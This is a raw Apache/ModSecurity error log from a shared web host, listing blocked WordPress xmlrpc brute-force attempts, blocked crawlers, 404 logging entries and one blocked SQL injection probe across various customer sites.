[Tue May 26 16:08:19.105945 2026] [security2:error] [pid 773493:tid 773737] [client 106.219.85.83:23070] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Gpgy-Vk4jSdqTCRCCgAAAPc"]
[Tue May 26 16:08:19.276942 2026] [security2:error] [pid 773493:tid 773736] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Gpgy-Vk4jSdqTCRCCQAAAPY"]
[Tue May 26 16:08:19.604138 2026] [security2:error] [pid 773493:tid 773733] [client 85.208.96.204:26070] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-7th/day/2022-08-02/"] [unique_id "ahV4G5gy-Vk4jSdqTCRCFwAAAPM"]
[Tue May 26 16:08:19.604315 2026] [security2:error] [pid 773493:tid 773733] [client 85.208.96.204:26070] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-7th/day/2022-08-02/"] [unique_id "ahV4G5gy-Vk4jSdqTCRCFwAAAPM"]
[Tue May 26 16:08:20.555914 2026] [security2:error] [pid 773493:tid 773704] [client 107.189.18.44:51447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.18.189.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV4HJgy-Vk4jSdqTCRCKAAAANY"], referer: https://www.cagmedya.com/
[Tue May 26 16:08:20.556149 2026] [security2:error] [pid 773493:tid 773704] [client 107.189.18.44:51447] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV4HJgy-Vk4jSdqTCRCKAAAANY"], referer: https://www.cagmedya.com/
[Tue May 26 16:08:20.634675 2026] [autoindex:error] [pid 773493:tid 773655] [client 45.148.10.159:35014] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:08:20.635405 2026] [security2:error] [pid 773493:tid 773655] [client 45.148.10.159:35014] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.stvica.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV4HJgy-Vk4jSdqTCRCLAAAAKU"]
[Tue May 26 16:08:21.302593 2026] [security2:error] [pid 773493:tid 773679] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4HJgy-Vk4jSdqTCRCMgAAAL0"]
[Tue May 26 16:08:22.111466 2026] [security2:error] [pid 773493:tid 773731] [client 103.44.52.196:58590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Hpgy-Vk4jSdqTCRCSgAAAPE"]
[Tue May 26 16:08:22.111642 2026] [security2:error] [pid 773493:tid 773731] [client 103.44.52.196:58590] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Hpgy-Vk4jSdqTCRCSgAAAPE"]
[Tue May 26 16:08:22.792453 2026] [security2:error] [pid 773493:tid 773723] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Hpgy-Vk4jSdqTCRCVgAAAOk"]
[Tue May 26 16:08:22.934256 2026] [security2:error] [pid 773493:tid 773620] [remote 216.185.214.209:51204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV4Hpgy-Vk4jSdqTCRCXgAArH4"]
[Tue May 26 16:08:23.999473 2026] [security2:error] [pid 773493:tid 773687] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "atreegroup.com"] [uri "/index.php"] [unique_id "ahV4Hpgy-Vk4jSdqTCRCUwAAAMU"]
[Tue May 26 16:08:25.381088 2026] [security2:error] [pid 773493:tid 773647] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4IJgy-Vk4jSdqTCRCmQAAAJ0"]
[Tue May 26 16:08:27.500496 2026] [security2:error] [pid 773493:tid 773629] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4I5gy-Vk4jSdqTCRCzwAAAIs"]
[Tue May 26 16:08:29.079325 2026] [security2:error] [pid 773493:tid 773663] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4JJgy-Vk4jSdqTCRC7wAAAK0"]
[Tue May 26 16:08:29.209788 2026] [security2:error] [pid 773493:tid 773507] [remote 52.167.144.215:4717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "amdsi.org.in"] [uri "/amdsi-districtofficers.php"] [unique_id "ahV4JZgy-Vk4jSdqTCRC_wAAjQ0"]
[Tue May 26 16:08:29.503457 2026] [security2:error] [pid 773493:tid 773635] [client 114.119.159.16:57037] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project_category/tienda-online/"] [unique_id "ahV4JZgy-Vk4jSdqTCRDBgAAAJE"], referer: https://www.jhonweb.com/portafolio
[Tue May 26 16:08:29.541199 2026] [security2:error] [pid 773493:tid 773696] [client 106.219.85.83:17552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4JZgy-Vk4jSdqTCRDBwAAAM4"]
[Tue May 26 16:08:29.541330 2026] [security2:error] [pid 773493:tid 773696] [client 106.219.85.83:17552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4JZgy-Vk4jSdqTCRDBwAAAM4"]
[Tue May 26 16:08:31.649122 2026] [security2:error] [pid 773493:tid 773650] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4J5gy-Vk4jSdqTCRDIgAAAKA"]
[Tue May 26 16:08:32.767293 2026] [security2:error] [pid 773493:tid 773631] [client 103.44.52.196:57324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4KJgy-Vk4jSdqTCRDVwAAAI0"]
[Tue May 26 16:08:32.767437 2026] [security2:error] [pid 773493:tid 773631] [client 103.44.52.196:57324] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4KJgy-Vk4jSdqTCRDVwAAAI0"]
[Tue May 26 16:08:33.123305 2026] [security2:error] [pid 773493:tid 773670] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4KJgy-Vk4jSdqTCRDVgAAALQ"]
[Tue May 26 16:08:35.805475 2026] [security2:error] [pid 773493:tid 773741] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4K5gy-Vk4jSdqTCRDigAAAPs"]
[Tue May 26 16:08:37.180604 2026] [security2:error] [pid 773493:tid 773747] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4LJgy-Vk4jSdqTCRDowAAAQE"]
[Tue May 26 16:08:39.300111 2026] [security2:error] [pid 773493:tid 773740] [client 84.37.240.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV4Lpgy-Vk4jSdqTCRDxgAAAPo"]
[Tue May 26 16:08:39.776774 2026] [security2:error] [pid 773493:tid 773667] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4L5gy-Vk4jSdqTCRD2wAAALE"]
[Tue May 26 16:08:40.103698 2026] [security2:error] [pid 773493:tid 773747] [client 106.219.85.83:3433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4MJgy-Vk4jSdqTCRD6AAAAQE"]
[Tue May 26 16:08:40.103838 2026] [security2:error] [pid 773493:tid 773747] [client 106.219.85.83:3433] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4MJgy-Vk4jSdqTCRD6AAAAQE"]
[Tue May 26 16:08:41.714566 2026] [autoindex:error] [pid 773493:tid 773712] [client 40.160.16.154:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:08:41.809445 2026] [security2:error] [pid 773493:tid 773739] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4MZgy-Vk4jSdqTCREBgAAAPk"]
[Tue May 26 16:08:42.646053 2026] [core:error] [pid 773493:tid 773647] [client 198.235.24.129:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:08:42.646070 2026] [core:error] [pid 773493:tid 773647] [client 198.235.24.129:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:08:43.237284 2026] [security2:error] [pid 773493:tid 773710] [client 103.44.52.196:58532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4M5gy-Vk4jSdqTCREKwAAANw"]
[Tue May 26 16:08:43.237451 2026] [security2:error] [pid 773493:tid 773710] [client 103.44.52.196:58532] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4M5gy-Vk4jSdqTCREKwAAANw"]
[Tue May 26 16:08:43.495539 2026] [security2:error] [pid 773493:tid 773715] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4M5gy-Vk4jSdqTCREKgAAAOE"]
[Tue May 26 16:08:45.211958 2026] [security2:error] [pid 773493:tid 773669] [client 14.240.200.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4NJgy-Vk4jSdqTCREWgAAALM"]
[Tue May 26 16:08:46.374250 2026] [security2:error] [pid 773493:tid 773731] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4NZgy-Vk4jSdqTCREdgAAAPE"]
[Tue May 26 16:08:48.020833 2026] [security2:error] [pid 773493:tid 773652] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4N5gy-Vk4jSdqTCRElgAAAKI"]
[Tue May 26 16:08:50.242705 2026] [security2:error] [pid 773493:tid 773688] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4OZgy-Vk4jSdqTCREwQAAAMY"]
[Tue May 26 16:08:50.830578 2026] [security2:error] [pid 773493:tid 773633] [client 106.219.85.83:10775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Opgy-Vk4jSdqTCRE0gAAAI8"]
[Tue May 26 16:08:50.830780 2026] [security2:error] [pid 773493:tid 773633] [client 106.219.85.83:10775] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4Opgy-Vk4jSdqTCRE0gAAAI8"]
[Tue May 26 16:08:52.063145 2026] [security2:error] [pid 773493:tid 773666] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4O5gy-Vk4jSdqTCRE5wAAALA"]
[Tue May 26 16:08:52.103299 2026] [security2:error] [pid 773493:tid 773729] [client 185.16.39.114:60019] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/index\\\\.php/admin/catalog_category/save|(?:/admin/stats|/css/gallery-css)\\\\.php\\\\?1=1|/admin\\\\.php\\\\?tile=mail$|/catalog_category/save/key/|/\\\\?op=admin_settings|^/\\\\?openpage=|^/admin/extra|^/node/[0-9]+/edit\\\\?destination=admin/content|^/administ ..." against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "321"] [id "340145"] [rev "43"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe"] [data " 1=1"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV4O5gy-Vk4jSdqTCRE6QAAAO8"]
[Tue May 26 16:08:52.103430 2026] [security2:error] [pid 773493:tid 773729] [client 185.16.39.114:60019] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV4O5gy-Vk4jSdqTCRE6QAAAO8"]
[Tue May 26 16:08:53.702315 2026] [security2:error] [pid 773493:tid 773710] [client 103.44.52.196:55226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4PZgy-Vk4jSdqTCRFBwAAANw"]
[Tue May 26 16:08:53.702496 2026] [security2:error] [pid 773493:tid 773710] [client 103.44.52.196:55226] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4PZgy-Vk4jSdqTCRFBwAAANw"]
[Tue May 26 16:08:53.898636 2026] [security2:error] [pid 773493:tid 773649] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4PZgy-Vk4jSdqTCRFBgAAAJ8"]
[Tue May 26 16:08:56.814103 2026] [security2:error] [pid 773493:tid 773693] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4QJgy-Vk4jSdqTCRFOQAAAMs"]
[Tue May 26 16:08:58.022412 2026] [security2:error] [pid 773493:tid 773678] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4QZgy-Vk4jSdqTCRFWQAAALw"]
[Tue May 26 16:08:58.986041 2026] [security2:error] [pid 773493:tid 773646] [client 66.249.89.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahV4Qpgy-Vk4jSdqTCRFZgAAAJw"]
[Tue May 26 16:08:59.889198 2026] [security2:error] [pid 773493:tid 773626] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Q5gy-Vk4jSdqTCRFfQAAAIg"]
[Tue May 26 16:09:01.328999 2026] [security2:error] [pid 773493:tid 773642] [client 106.219.85.83:29548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4RZgy-Vk4jSdqTCRFowAAAJg"]
[Tue May 26 16:09:01.329128 2026] [security2:error] [pid 773493:tid 773642] [client 106.219.85.83:29548] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4RZgy-Vk4jSdqTCRFowAAAJg"]
[Tue May 26 16:09:02.645553 2026] [security2:error] [pid 773493:tid 773733] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Rpgy-Vk4jSdqTCRFtAAAAPM"]
[Tue May 26 16:09:04.249220 2026] [security2:error] [pid 773493:tid 773696] [client 103.44.52.196:58388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4SJgy-Vk4jSdqTCRF4AAAAM4"]
[Tue May 26 16:09:04.249368 2026] [security2:error] [pid 773493:tid 773696] [client 103.44.52.196:58388] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4SJgy-Vk4jSdqTCRF4AAAAM4"]
[Tue May 26 16:09:04.292084 2026] [security2:error] [pid 773493:tid 773642] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4R5gy-Vk4jSdqTCRF1QAAAJg"]
[Tue May 26 16:09:04.315891 2026] [security2:error] [pid 773493:tid 773625] [client 114.119.152.231:47001] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/tdb_templates/100-stories-post-template-5"] [unique_id "ahV4SJgy-Vk4jSdqTCRF4QAAAIc"], referer: https://preetishah.com/tdb_templates/100-stories-post-template-5
[Tue May 26 16:09:04.868034 2026] [security2:error] [pid 773493:tid 773707] [client 66.249.70.141:43021] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV4SJgy-Vk4jSdqTCRF7gAAANk"]
[Tue May 26 16:09:06.649001 2026] [security2:error] [pid 773493:tid 773700] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4Spgy-Vk4jSdqTCRGHAAAANI"]
[Tue May 26 16:09:08.044051 2026] [security2:error] [pid 773493:tid 773727] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4S5gy-Vk4jSdqTCRGSAAAAO0"]
[Tue May 26 16:09:10.196941 2026] [security2:error] [pid 773493:tid 773633] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4TZgy-Vk4jSdqTCRGdAAAAI8"]
